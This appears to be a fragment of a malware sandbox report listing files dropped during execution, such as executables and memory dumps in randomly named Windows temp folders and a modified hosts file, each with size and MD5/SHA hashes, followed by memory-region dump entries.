d1a23af4bac08d07856b81d4ba1e8b221da0b01294b141259e2db27eef13995d

SHA512
3977698e91ad6ce51baa5d203295d3c57e4a311b473ebc86c3e2943a72d495ae5e0f1fd3b15635e7f9a454e67ff8f337e543f4701730bc26c59a26ee27b53d66

Download Submit
C:\Windows\TEMP\ppgkyibiq\388.dmp

Filesize
33.4MB

MD5
54b9bc14867a71c9975278bd48842278

SHA1
e2e1b7dce593a55b57dac8db758011f85ee92d44

SHA256
39e44c8f75b0f90e73e4025f22bbddc1f5c1f1ac1787e4cc6b27c4d74d9db7f7

SHA512
b56613975779d7ee6187646d1e8bc31f09faf250362a3ebc22336790a07da5b6ebb84030a4a881fb2e16b84cfac5ccb73a0c3252e43446da7559699959b87133

Download Submit
C:\Windows\TEMP\ppgkyibiq\3924.dmp

Filesize
21.0MB

MD5
df3973b2f5c6e15990915e4b177e9afe

SHA1
3fcb7f1fba2753c096be909f287ea051d6641b76

SHA256
753d34c8cc9baf1b42ab54fb9592ad231b0734ec14f90a5299025a416d2f5c58

SHA512
40a0d658b0cec9d9f8023a4473e04f9029dec29a82ad534f74b102e4ad5413c0a003be687cf97ea587bd86f6d35fb1e06822250b8b89ded1c1b8f3bebea72f54

Download Submit
C:\Windows\TEMP\ppgkyibiq\3992.dmp

Filesize
8.5MB

MD5
0d447becc94ec0e98e87d79b8fc4e079

SHA1
8c4daf61a5f34b22d13e13841a1fa30f02a972bc

SHA256
8fbfbe00d1be0788c8506a79030e48d2f8dfcec8cd068ad6589ecc9984061af3

SHA512
0498468844b51a933a447b4d95e31bf896d4587ef173e7fd7598e41493d4191daba0863ea8bd3e7c1b7c15297b931ba279558719c583293329a6323b3791e10e

Download Submit
C:\Windows\TEMP\ppgkyibiq\4072.dmp

Filesize
45.9MB

MD5
bd003b0162248feeeb3fd54139733126

SHA1
9a13e100240709aedf547e2a2fc0875f5f8cb265

SHA256
9aac496e727f2d571662411175fc1c26a4afb551efea7f8de4215dc1c33e43de

SHA512
550772f05b8fe1e5ed6931584757ee9e8906cc196e4e2712c589f07c4a00493dfb51bd5dab56ac2045bf9b2f44ae890815b05b3936900f0cdf52484374764fb8

Download Submit
C:\Windows\TEMP\ppgkyibiq\780.dmp

Filesize
1019KB

MD5
5bd6823cc6db0783c50fb31ede346e17

SHA1
a79b9aaf4c6ee59755a1f67c50cfee23f7cad875

SHA256
2364b48a375e5a32f7f396adca0d95dd5afda4d96ed96c66e9a5c1f8009ae528

SHA512
f923ad7f7ed5e053c1a76f99bd844944ddb0b53842142d0347eff08abbe3f80d769adfa57bc627b7812941f65482198fc27516ab87e7b58cca20774b4ea371b3

Download Submit
C:\Windows\Temp\lntjubmbe\ttlnnh.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nso1C6E.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nso1C6E.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\ppgkyibiq\btjlhtrlh.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ppgkyibiq\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
b72fbd040cffd982015139dd146a627d

SHA1
6fc95128f468bfcce9b209d950ab85866345aea4

SHA256
27e185a93d556e46b9c84ab26a3556f63e0548730d78e4c5b3626010ee3ad18e

SHA512
db52843afa64532c605d6cf4a4bfdb7b19537bce76162d8e83ed12194d2a99bbd514050ae4e6aad07d5902466300a4ecf6d498c509b88dbfc369802bb5789512

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
1a26369b1eec59a82e79e7da33d75165

SHA1
d4d7b50b5a278748aa29daef0ac66cd4df77aa3b

SHA256
0805c00ee1dcd7c9b86deab5d2c17b6d536a3849af7c0721f8337b97fa419ddc

SHA512
78dacced7e3c4b3cce10907084151aed903c00b3e287f8913d74e470483fa6f63538dda7f245e5c2a1846df22e8f445c4b6f5ed2328452f399e6467f979de85d

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
bd8d70a621109d2450857a9e106a684a

SHA1
6ea7338d0c2a1836af65e91d77858a8b1f688fad

SHA256
dff22d9d6d26de44bed30c5d7a5872d3b1f662e1ae95b6451c456ebd214c2a11

SHA512
54c4f5e1bd2ba78cf15ee2dd0f449621965a5ec3ef21ddff0388f7cac3b26e4bf1ee732d27a9cbd8d3904788ef51cf3812d0f3f3dc7c9c12c41d5be2765bbe29

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
6175d3b806e010bfbab41b2f8c788296

SHA1
843b48c02dd7e3e0355eacb0df0559dd08ccf92c

SHA256
666f23f7af06c25673f22184ac7e0b3faad6a81859d69f484eab71d662abc71e

SHA512
4ceded18509caf5aacc0060ef9600637c310f636e838ae718905fbd23df99a3a4fe1b14d36ab60f7257e4cecdc2f503bc7ecd8ec178e91b0fffd3500609c6669

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\tllefmnq\yittybr.exe

Filesize
10.1MB

MD5
804695466d5d8223fd1a93b4bfe313f1

SHA1
2288d1a13dfdebdfd56f3b875f6d52bbc57a9633

SHA256
00fabfb211aadd788e4c96056ba3a00fe97e6e981a40ab520cc8237bb212dd35

SHA512
c7e3d52184f90fd00e9f696abe603e5abff7f7e560850ee4ab598162319ab858e78505831c3c794db855dcdc30fdbb8af1f8d30cf4ea09e4fe239d4ecc0ae1dc

Download Submit
memory/264-238-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/800-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/800-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/800-138-0x00007FF760190000-0x00007FF76027E000-memory.dmp

Filesize
952KB

Download
memory/800-135-0x00007FF760190000-0x00007FF76027E000-memory.dmp

Filesize
952KB

Download
memory/1268-185-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/1368-219-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/1728-202-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/1748-79-0x0000000000FB0000-0x0000000000FFC000-memory.dmp

Filesize
304KB

Download
memory/1968-248-0x0000000000360000-0x0000000000372000-memory.dmp

Filesize
72KB

Download
memory/2192-197-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/2228-211-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/2256-180-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/2412-168-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2412-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/3012-171-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3276-142-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3276-146-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3380-236-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3652-175-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3704-228-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3968-193-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/3968-231-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/4032-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4128-234-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/4364-257-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-167-0x0000022FBC4F0000-0x0000022FBC500000-memory.dmp

Filesize
64KB

Download
memory/4364-382-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-164-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-268-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-379-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-199-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-377-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-232-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-209-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-249-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-182-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-178-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4364-221-0x00007FF7827F0000-0x00007FF782910000-memory.dmp

Filesize
1.1MB

Download
memory/4432-189-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/4568-206-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download
memory/5004-224-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp

Filesize
364KB

Download